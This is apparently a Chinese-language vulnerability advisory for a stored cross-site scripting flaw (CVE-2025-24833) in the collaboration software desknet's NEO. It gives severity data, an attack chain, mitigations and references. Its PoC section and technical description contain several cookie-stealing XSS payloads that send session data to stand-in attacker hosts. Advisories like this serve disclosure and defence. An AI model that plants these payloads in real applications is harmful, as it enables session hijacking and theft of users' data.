CVE-2025-24833 desknet's NEO存储型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-24833

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

desknet's NEO

漏洞概述

CVE-2025-24833是desknet's NEO协同办公软件中存在的一个存储型跨站脚本（Stored XSS）漏洞，由JPCERT/CC的vultures团队发现并报告。该漏洞影响desknet's NEO从V4.0R1.0到V9.0R2.0的多个版本，覆盖范围广泛，潜在威胁面较大。

desknet's NEO是由日本ネオジャパン（Neo Japan）公司开发的一款企业级群组协作软件，在日本国内市场拥有较高的占有率，广泛应用于企业内部的信息共享、文件管理、日程安排、邮件收发以及电子公告板（BBS）等功能。由于该软件属于企业内部核心协作平台，其安全性直接关系到企业内部数据和用户隐私的安全。

该漏洞的CVSS 3.0评分为5.4分，属于中危级别。攻击者需要具备低权限账户（已认证用户）才能发起攻击，攻击向量为网络传播，需要用户交互（如访问被注入恶意脚本的页面）才能触发漏洞执行。漏洞的成功利用可导致攻击者在受害者浏览器中执行任意JavaScript代码，从而窃取用户的会话Cookie、敏感信息，或以受害者身份执行未授权操作。

根据CVSS向量分析，该漏洞的影响范围为变更范围（Scope Changed），意味着漏洞的影响超出了受影响的组件本身，可能影响到其他安全域。虽然机密性和完整性影响均为低级别，但由于XSS漏洞常被用作钓鱼攻击、会话劫持和权限提升攻击链中的一环，其实际危害不容忽视。

技术细节

存储型跨站脚本（Stored XSS）是一种将恶意脚本永久存储在目标服务器上的Web安全漏洞。当其他用户访问受感染的页面时，恶意脚本会从服务器端加载并在受害者的浏览器中执行。

在desknet's NEO中，该漏洞的产生原因在于应用程序对用户输入数据的过滤和转义机制不完善。攻击者作为已认证的低权限用户，可以通过提交包含恶意JavaScript代码的内容（如电子公告板帖子、评论、个人资料字段等可输入文本的功能模块），将恶意脚本存储到服务器数据库中。由于服务器端未对存储的数据进行充分的HTML实体编码或安全过滤，这些恶意脚本会在其他用户浏览相关页面时被原样输出到HTML页面中，并由浏览器解析执行。

利用方式如下：
1. 攻击者使用合法凭证登录desknet's NEO系统；
2. 在支持富文本或HTML输入的功能区域（如公告板、日程备注、文件名等）注入恶意JavaScript代码，例如`<script>document.location='https://attacker.com/steal?c='+document.cookie</script>`；
3. 恶意脚本被持久化存储在服务器端；
4. 当其他用户（特别是具有更高权限的管理员）浏览包含恶意内容的页面时，脚本自动执行；
5. 攻击者可窃取会话令牌、进行钓鱼攻击或以受害者身份执行操作。

由于该漏洞需要低权限认证（PR:L），属于已认证用户可利用的漏洞类型，攻击门槛相对较低，在多用户企业内部环境中风险较高。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者通过社会工程学、购买泄露凭证或其他方式获取desknet's NEO系统的低权限用户账户。

STEP 2

步骤2：注入恶意载荷

攻击者登录系统后，在支持文本输入的功能模块（如电子公告板、日程备注、文件共享备注等）中提交包含恶意JavaScript代码的内容。

STEP 3

步骤3：持久化存储

由于服务器未对输入进行充分的过滤和HTML实体编码，恶意脚本被原样存储到后端数据库中。

STEP 4

步骤4：触发执行

当其他用户（特别是管理员或高权限用户）浏览包含恶意内容的页面时，浏览器解析并执行存储的恶意JavaScript代码。

STEP 5

步骤5：数据窃取与权限提升

恶意脚本窃取受害者会话Cookie，攻击者可利用被盗会话以受害者身份执行操作，进一步获取更高权限或敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-24833 - Stored XSS in desknet's NEO
Affected versions: V4.0R1.0 - V9.0R2.0
Vulnerability type: Stored Cross-Site Scripting (XSS)
-->

<!-- Step 1: Attacker logs in with low-privilege credentials -->
<!-- Step 2: Inject malicious payload into a stored input field (e.g., bulletin board post) -->

<!-- Payload 1: Basic cookie stealing -->
<script>
  var img = new Image();
  img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Payload 2: Session hijacking via fetch -->
<script>
  fetch('https://attacker.example.com/log', {
    method: 'POST',
    body: JSON.stringify({
      cookie: document.cookie,
      url: location.href,
      ua: navigator.userAgent
    })
  });
</script>

<!-- Payload 3: Event handler based XSS (in case <script> tags are filtered) -->
<img src=x onerror="fetch('https://attacker.example.com/steal?c='+document.cookie)">

<!-- Payload 4: SVG-based XSS -->
<svg onload="javascript:fetch('https://attacker.example.com/x?d='+document.domain)">

<!--
Step 3: Victim (e.g., administrator) views the page containing the stored payload
Step 4: Malicious JavaScript executes in victim's browser context
Step 5: Attacker captures session cookies or performs actions as the victim
-->

影响范围

desknet's NEO V4.0R1.0

desknet's NEO V4.x

desknet's NEO V5.x

desknet's NEO V6.x

desknet's NEO V7.x

desknet's NEO V8.x

desknet's NEO V9.0R2.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制低权限用户使用电子公告板、评论等可输入内容的模块；2）在Web应用防火墙（WAF）中部署针对XSS攻击的规则，拦截常见的恶意脚本载荷；3）为所有会话Cookie添加HttpOnly和Secure属性，降低会话被窃取的风险；4）加强用户安全意识培训，警惕可疑链接和页面；5）监控异常的用户行为和未授权访问尝试，及时发现潜在的利用行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-24833
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-24833
3 Details https://www.cvedetails.com/cve/CVE-2025-24833/
4 VulDB https://vuldb.com/cve/CVE-2025-24833
5 Link https://jvn.jp/en/jp/JVN90757550/
6 Link https://www.desknets.com/neo/support/mainte/17475/